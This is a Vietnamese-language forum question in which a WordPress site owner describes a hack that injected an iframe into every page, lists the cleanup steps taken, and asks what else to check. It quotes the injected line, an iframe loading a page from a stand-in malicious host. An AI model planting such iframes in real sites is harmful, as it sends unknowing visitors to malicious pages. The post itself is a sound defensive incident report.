Blog WordPress vui nhộn của tôi tại http://fakeplasticrock.com (chạy WordPress 3.1.1) đã bị hack - nó đang hiển thị <iframe>
trên mỗi trang như vậy:
<iframe src="http://evilsite.com/go/1"></iframe>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
Tôi đã làm như sau
- Nâng cấp lên 3.1.3 thông qua hệ thống nâng cấp WordPress tích hợp
- Đã cài đặt Trình quét khai thác (rất nhiều cảnh báo quan trọng đối với các tệp bất thường) và AntiVirus (điều này cho thấy tất cả đều xanh và sạch, vì vậy tôi đã gỡ cài đặt và xóa nó sau khi chạy)
- Thay đổi mật khẩu MySQL.
- Đã thay đổi tất cả mật khẩu người dùng WordPress.
- Đã kết nối qua FTP và tải xuống toàn bộ hệ thống tệp (không lớn, đây là máy chủ chia sẻ Linux chỉ dành cho WordPress)
- Đã thay đổi hệ thống tệp so với ZIP chính thức của WordPress 3.1.3 và xóa hoặc ghi đè lên bất cứ thứ gì không khớp.
Tôi khá chắc chắn rằng
- tất cả các tệp trên đĩa đều là các tệp WordPress 3.1.3 chính thức
- không có tệp "phụ" nào trên đĩa ngoài tệp của tôi
/theme
, plugin Khai thác (mà tôi vừa tải xuống),/uploads
thư mục và một số ít các tệp dự kiến khác. Plugin khác của tôi, wp-recaptcha, phù hợp với phiên bản tải xuống chính thức hiện tại. - Tôi cũng đã kiểm tra
.htaccess
tập tin và không có gì sai ở đó
Tôi đã không chạm vào cơ sở dữ liệu , nhưng tôi đang cố gắng nghĩ làm thế nào bất cứ thứ gì trong cơ sở dữ liệu có thể độc hại nếu không có mã PHP đặc biệt để làm cho nó hoạt động?
Blog WordPress của tôi hiện có vẻ ổn và không có hack (tôi nghĩ vậy), nhưng tôi còn cần kiểm tra gì nữa không?